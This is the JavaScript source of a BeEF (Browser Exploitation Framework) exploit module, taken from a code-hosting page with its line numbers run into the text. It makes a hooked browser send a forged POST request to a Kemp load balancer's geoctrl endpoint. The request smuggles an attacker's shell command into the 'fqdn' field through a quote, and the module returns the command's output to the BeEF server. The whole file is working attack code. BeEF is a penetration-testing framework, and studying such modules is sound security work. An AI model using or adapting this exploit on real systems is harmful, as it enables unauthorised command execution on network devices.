Path: blob/master/modules/exploits/kemp_command_execution/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var rhost = '<%= @rhost %>';9var rport = '<%= @rport %>';10var timeout = '<%= @timeout %>';111213var path = '/progs/geoctrl/doadd';14var cmd = "<%= @cmd %>";1516if (rhost.substring(0,5) == "https") {17rhost = rhost.replace("https://","")18protocol = "https"19}20else {21rhost = rhost.replace("http://","")22protocol = "http"23}242526beef.net.forge_request(protocol, "POST", rhost, rport, path, null, null, { fqdn: "' <%= @cmd %>'" }, 10, 'html', false, null, function(response) {27resp = response.headers+response.response_body;28start = resp.indexOf("Content-Type: text/html");29end = resp.indexOf("Cache-Control: no-cache");30final = resp.slice(start+23,end)31beef.net.send("<%= @command_url %>", <%= @command_id %>, final)32});33343536});373839